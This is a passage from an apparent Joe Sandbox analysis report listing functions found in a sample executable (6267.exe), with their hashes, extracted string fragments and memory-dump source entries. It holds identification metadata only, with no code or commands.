                                                                                • API String ID: 0-1291360158
                                                                                • Opcode ID: 0c4d4502c6196317015b94aea25025952d428ed83f28c07abe1ef988d46b9726
                                                                                • Instruction ID: 5d2f98ec6226c52be2ae37c5f3784be8bfad0c852244d9834000319a76522e30
                                                                                • Opcode Fuzzy Hash: 0c4d4502c6196317015b94aea25025952d428ed83f28c07abe1ef988d46b9726
                                                                                • Instruction Fuzzy Hash: D242A721B0C6C287EE788E6864A4A3E7290AFD4751F60413AE9DFC7BD5CE2CEC544B51
                                                                                Function 00007FF6CC343E30 Relevance: 11.9, Strings: 9, Instructions: 605COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "($"($@N[$@N[$@N[$@N[$CEj'$DEj'$DEj'
                                                                                • API String ID: 0-2996620231
                                                                                • Opcode ID: f28b6044c619f726cc9ad03304f5b7935733e316f4ad705018a347a370ebd92c
                                                                                • Instruction ID: 908c501167bc27743e1c7e272108d73f40bb3341ba3f339fff4bae9eb1f0bc36
                                                                                • Opcode Fuzzy Hash: f28b6044c619f726cc9ad03304f5b7935733e316f4ad705018a347a370ebd92c
                                                                                • Instruction Fuzzy Hash: CF32CD27A0D5C186EAB4CE14B444E7E6B91EF44752F604936EADDC7B94CF2EE8814F01
                                                                                Function 00007FF6CC33BC00 Relevance: 10.5, Strings: 8, Instructions: 464COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ,n$,n$l*y$l*y$1NP$1NP$1NP$1NP
                                                                                • API String ID: 0-1722865417
                                                                                • Opcode ID: db6509c72773b2e61c1f25060d31486532863ac72bae4357264d848426d9d707
                                                                                • Instruction ID: a9839dfe06608716308ce7813efbeaebc163e69176d8752140512e9b24b1ac8d
                                                                                • Opcode Fuzzy Hash: db6509c72773b2e61c1f25060d31486532863ac72bae4357264d848426d9d707
                                                                                • Instruction Fuzzy Hash: 5C122F61F08685CFFB349F79B48197D27A0AB94799F184636ED8DC7794CE2CE8824381
                                                                                Function 00007FF6CC361880 Relevance: 9.6, Strings: 7, Instructions: 881COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: uLh$ uLh$ uLh$[t!:$[t!:$[t!:$[t!:
                                                                                • API String ID: 0-874898717
                                                                                • Opcode ID: 5e0a50c2ee5c35c28fccc85bbf1bb913c022d5b21abb8f6da954ffe1541928b0
                                                                                • Instruction ID: 8f148a02fe07481f021b7b5a987208c46c372d74aa26df3c965e319bdb207681
                                                                                • Opcode Fuzzy Hash: 5e0a50c2ee5c35c28fccc85bbf1bb913c022d5b21abb8f6da954ffe1541928b0
                                                                                • Instruction Fuzzy Hash: D982D536A0CEC686DB748E15B490ABE77D0FB84395F244532EADED7B98CE2CD4408B45
                                                                                Function 00007FF6CC3A4E10 Relevance: 9.5, Strings: 7, Instructions: 799COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 9-Y!$:-Y!$:-Y!$HG$X@%T$Y@%T$Y@%T
                                                                                • API String ID: 0-1780662477
                                                                                • Opcode ID: d2613bed107605d1fb09313b4cf4704ddb6acf3d551b46a388c776f1c48611c4
                                                                                • Instruction ID: 5c410edbfd5b3f7d2603b59069371e840f44f71ba56714166e6a4330cf25fec5
                                                                                • Opcode Fuzzy Hash: d2613bed107605d1fb09313b4cf4704ddb6acf3d551b46a388c776f1c48611c4
                                                                                • Instruction Fuzzy Hash: 4972FA22B0C6C186EF748E95B090A3EA791EBC47A1F605536E9DEC7BE5CF2CD4504B01
                                                                                Function 00007FF6CC379550 Relevance: 9.4, Strings: 7, Instructions: 652COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: A)an$B)an$B)an$R>t0$R>t0$h @m$h @m
                                                                                • API String ID: 0-2014293124
                                                                                • Opcode ID: a952c9efa5565efe295c4d81218c6562816acb387cb051f672b544dc10768fb4
                                                                                • Instruction ID: 1c7536560f6ead0b30c8c95c8b58ec4e142d10d9ffda5e8880f983fcf8e4faa8
                                                                                • Opcode Fuzzy Hash: a952c9efa5565efe295c4d81218c6562816acb387cb051f672b544dc10768fb4
                                                                                • Instruction Fuzzy Hash: 8152FC6290C2E1C5F6348E25B200A3A6EA0B754765F158132DEDFB3798DE7DE841EF81
                                                                                Function 00007FF6CC354E00 Relevance: 8.1, Strings: 6, Instructions: 566COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .qsZ$/qsZ$/qsZ$9W1_$9W1_$9W1_
                                                                                • API String ID: 0-2543634031
                                                                                • Opcode ID: 89402d96b922411b10ae2d4b834ca260871eabe2cfc4e2231c842ed1cf945998
                                                                                • Instruction ID: 4962f98de1fd6017cc2316e99326fda2c6957fd49b51aee08c89bae460166b17
                                                                                • Opcode Fuzzy Hash: 89402d96b922411b10ae2d4b834ca260871eabe2cfc4e2231c842ed1cf945998
                                                                                • Instruction Fuzzy Hash: D222197793869546E3228E66B14052BB691B794B73F069221FEEB53BD4CB78EC018B40
                                                                                Function 00007FF6CC3AC230 Relevance: 7.7, Strings: 5, Instructions: 1434COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: DV$C:\Users\user\AppData\Local\Temp\6267.exe$jsx6$ksx6$ksx6
                                                                                • API String ID: 0-1537684618
                                                                                • Opcode ID: 1d23c07042c6ce4f6880151f9bc50497c94753d57e86f9ce995a9aa16bbd1d7d
                                                                                • Instruction ID: 8bf522c96792f5cef58e9b3abffa07fb4e85df6c189361baa067554515620fac
                                                                                • Opcode Fuzzy Hash: 1d23c07042c6ce4f6880151f9bc50497c94753d57e86f9ce995a9aa16bbd1d7d
                                                                                • Instruction Fuzzy Hash: CAE22622E08AC18DEB784F7568646FC37A0EBC574AF14413ADACE8EBD5CE1D9661C301
                                                                                Function 00007FF6CC3AF5B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 202COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: X,n$Y,n$Y,n
                                                                                • API String ID: 0-3478138459
                                                                                • Opcode ID: 7393856a027c7c6f6f46535301fb7d281f3932de209073a71f34fae8c4450ff3
                                                                                • Instruction ID: 0e55f17be953bb6a622f4757b8814497c62275c5ef7aabe483971cd170466a3a
                                                                                • Opcode Fuzzy Hash: 7393856a027c7c6f6f46535301fb7d281f3932de209073a71f34fae8c4450ff3
                                                                                • Instruction Fuzzy Hash: 4E918432B15B8988FB118FBAE8412BC67B0BB4C799F144621DE9CA3774DF38D5928710
                                                                                Function 00007FF6CC3ADFD0 Relevance: 7.2, Strings: 5, Instructions: 941COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $h$ijs'$jjs'$jjs'
                                                                                • API String ID: 0-1211271916
                                                                                • Opcode ID: 0833125dcb91bdd4cf693f336b6095aefd514b8c7e616e284175bf29d955a52d
                                                                                • Instruction ID: 57f34ae93aed9d69745a58bc07d757f970fd6e02daf76735bb30fd166a5d3ffd
                                                                                • Opcode Fuzzy Hash: 0833125dcb91bdd4cf693f336b6095aefd514b8c7e616e284175bf29d955a52d
                                                                                • Instruction Fuzzy Hash: 9092B43560C6C586EE748E9AB4A4BBEB391EBD4351F204636DACDC37E4DE2DD4608B01
                                                                                Function 00007FF6CC373150 Relevance: 7.2, Strings: 5, Instructions: 940COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 5n!$5n!$uc[$vc[$vc[
                                                                                • API String ID: 0-468549941
                                                                                • Opcode ID: d689dfdf6a0b0cb9c1b3688676b1d608ce7ada2b7317cd4df454248670db6ae6
                                                                                • Instruction ID: 55bb6fe8a81eb1591bbcfae17a979e6dedbadce7de76c5dd311a7baee9476712
                                                                                • Opcode Fuzzy Hash: d689dfdf6a0b0cb9c1b3688676b1d608ce7ada2b7317cd4df454248670db6ae6
                                                                                • Instruction Fuzzy Hash: C982CD3660C6C6C6EAB48E19F590A7EA391EB45751F208536D5CDCBB94DF2CE8C0DB02
                                                                                Function 00007FF6CC38E430 Relevance: 7.1, Strings: 5, Instructions: 809COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 5nki$5nki$:A?h$;A?h$;A?h
                                                                                • API String ID: 0-3808611175
                                                                                • Opcode ID: 17a1e6e6661ad7bc9c360cf986403d14216c4d987dcc975ae746ad0f804ab0f5
                                                                                • Instruction ID: 2a92499631e7c6a14d91f579c8d7f22a62ef7c877d5da0237aed1d0052b31ec1
                                                                                • Opcode Fuzzy Hash: 17a1e6e6661ad7bc9c360cf986403d14216c4d987dcc975ae746ad0f804ab0f5
                                                                                • Instruction Fuzzy Hash: D372B73AB1C6C186EA748E19B450F7E6691FB85751F204937EADECBBD4EE2CD4408B01
                                                                                Function 00007FF6CC3811F0 Relevance: 7.0, Strings: 5, Instructions: 718COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: T1Of$U1Of$U1Of$U1Of$n5
                                                                                • API String ID: 0-4219401299
                                                                                • Opcode ID: 156d973a6913e7ebed99fc9eb6a973d56276dfb1d76b04b459c2c9c134cb810a
                                                                                • Instruction ID: 4a4e11ab983d29ca8a847e10624696d5eb0c8324196a9c3f6584ce59e0df2363
                                                                                • Opcode Fuzzy Hash: 156d973a6913e7ebed99fc9eb6a973d56276dfb1d76b04b459c2c9c134cb810a
                                                                                • Instruction Fuzzy Hash: 02620966A1C3D286E7B04F51B080E7EB6A0EB557A2F104137DECDD7B95CE6ED8408B81
                                                                                Function 00007FF6CC3B6B70 Relevance: 5.5, Strings: 4, Instructions: 512COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: wnZ:$wnZ:$wtx^$wtx^
                                                                                • API String ID: 0-3875597248
                                                                                • Opcode ID: d42e7927fa4a0fe237480d81f572ed3daddb1ee9c9cde7802877bc667d80464b
                                                                                • Instruction ID: 7f4bda57aeafb8bee3afe6b4e3f2190fba07373bab333ad300d5ce70dc498a35
                                                                                • Opcode Fuzzy Hash: d42e7927fa4a0fe237480d81f572ed3daddb1ee9c9cde7802877bc667d80464b
                                                                                • Instruction Fuzzy Hash: 0322D961A0CDCA85EE38CE16B424A3FAE74FB5079DF109132D9DE8BB9ACE6CD4404741
                                                                                Function 00007FF6CC39898B Relevance: 4.4, Strings: 3, Instructions: 688COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: *FN$W}:!$[[\
                                                                                • API String ID: 0-977268304
                                                                                • Opcode ID: 118ec3e17abe85086266d520440cbc38ebe286edce6aa2a945ce8fe094973cb1
                                                                                • Instruction ID: fb14515cd32d7fa749b003c564f27573451389e29ac46783e1f05be1bb344011
                                                                                • Opcode Fuzzy Hash: 118ec3e17abe85086266d520440cbc38ebe286edce6aa2a945ce8fe094973cb1
                                                                                • Instruction Fuzzy Hash: E862AA26A0CBC58AEB744F39A884BFD2390EF54759F104532DA9DCB794DF29E6808743
                                                                                Function 00007FF6CC3B49F0 Relevance: 4.3, Strings: 3, Instructions: 532COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: :.i$:.i$:.i
                                                                                • API String ID: 0-2131094505
                                                                                • Opcode ID: 3b60b99af8d6a4cc2720914cd319dbf41b638c4fd23604b3d10f052ebded4ee4
                                                                                • Instruction ID: c7d12f5b82fa97f15730352f764fec9fa9981f5c923e10538d0acdacf05e4016
                                                                                • Opcode Fuzzy Hash: 3b60b99af8d6a4cc2720914cd319dbf41b638c4fd23604b3d10f052ebded4ee4
                                                                                • Instruction Fuzzy Hash: D532A77341CEC595E663CE25B01053BBF68FB85792F009622EADF76A68CF7CD5428A10
                                                                                Function 00007FF6CC34CFF0 Relevance: 4.2, Strings: 3, Instructions: 422COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @W$@W$@W
                                                                                • API String ID: 0-4000198689
                                                                                • Opcode ID: f828dc5048065b2a4ea36b46b74603e476538ee5a3cf911f238680742ef889af
                                                                                • Instruction ID: 85b2e42df120d45d1ee860ceb3df9a9fcab2c2705a221ba853cd5bbcb6adc92a
                                                                                • Opcode Fuzzy Hash: f828dc5048065b2a4ea36b46b74603e476538ee5a3cf911f238680742ef889af
                                                                                • Instruction Fuzzy Hash: 4402E925B0C2C286EA75CE28F090F7E6B919BC4313F6041B6E9CDD7795CE2EE8419B41
                                                                                Function 00007FF6CC3757C0 Relevance: 4.2, Strings: 3, Instructions: 410COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: *ls$*ls$*ls
                                                                                • API String ID: 0-3118405165
                                                                                • Opcode ID: 6b274dccccb35f5f95b39d903b1cde6055285413bf085d91c5422f8376950b91
                                                                                • Instruction ID: 432fd2ed877a458a36ae413a4ea6f8a2726a6403a94ddcac76fe49be7af8f199
                                                                                • Opcode Fuzzy Hash: 6b274dccccb35f5f95b39d903b1cde6055285413bf085d91c5422f8376950b91
                                                                                • Instruction Fuzzy Hash: B4F10B22F0C6C1D7EA788F14B694A3E66D0EB44366F644636E9EDCB7E4CE2CD8409711
                                                                                Function 00007FF6CC35FC10 Relevance: 3.1, Strings: 2, Instructions: 572COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: H3C&$H3C&
                                                                                • API String ID: 0-1770148612
                                                                                • Opcode ID: 293444d22200035bd8cd0b39f3f69fa6dd64bbc19e1a05dac3e0bea0ca0a8459
                                                                                • Instruction ID: 793691d3d0a9f52fb40e5846f5f3fbf9301921f2bb57f060df45f6cabd92d4ec
                                                                                • Opcode Fuzzy Hash: 293444d22200035bd8cd0b39f3f69fa6dd64bbc19e1a05dac3e0bea0ca0a8459
                                                                                • Instruction Fuzzy Hash: D232D775A5CAC186EA748E25B481B7E7390FB887D1F204636EEDDC7B94CE2CE4418B41
                                                                                Function 00007FF6CC35A9D0 Relevance: 3.0, Strings: 2, Instructions: 489COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ;:$;:
                                                                                • API String ID: 0-2197980198
                                                                                • Opcode ID: 99c94250f0b0a1126aeeff1d3f389baf56e5bcdeae9a13661fc78fb5ba748f89
                                                                                • Instruction ID: faf88d65d25a7413a1293a5ef4f434f136d0809b77adb406bf1b10b3e18522ca
                                                                                • Opcode Fuzzy Hash: 99c94250f0b0a1126aeeff1d3f389baf56e5bcdeae9a13661fc78fb5ba748f89
                                                                                • Instruction Fuzzy Hash: B502187BD0C6A58B97258E19A54002AF691F784771F165621EEEE637E0CB3CDE809FC0
                                                                                Function 00007FF6CC33FB70 Relevance: 2.8, Strings: 2, Instructions: 275COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: W!$W!
                                                                                • API String ID: 0-695975270
                                                                                • Opcode ID: 4d0958b0a765513eb7a7ebe740961f25a1d9790526d60d0cea0c1aa12fafe601
                                                                                • Instruction ID: 3d06c4ae44fdbf0fabf2b77b5174df01e73a9ccc48c62bb271480fbd27497fba
                                                                                • Opcode Fuzzy Hash: 4d0958b0a765513eb7a7ebe740961f25a1d9790526d60d0cea0c1aa12fafe601
                                                                                • Instruction Fuzzy Hash: FFB1EA67A5C2C147EA648F24789093E66D0AB89352FAC4572FECDC37A4CE2CDC468B41
                                                                                Function 00007FF6CC394370 Relevance: .6, Instructions: 618COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
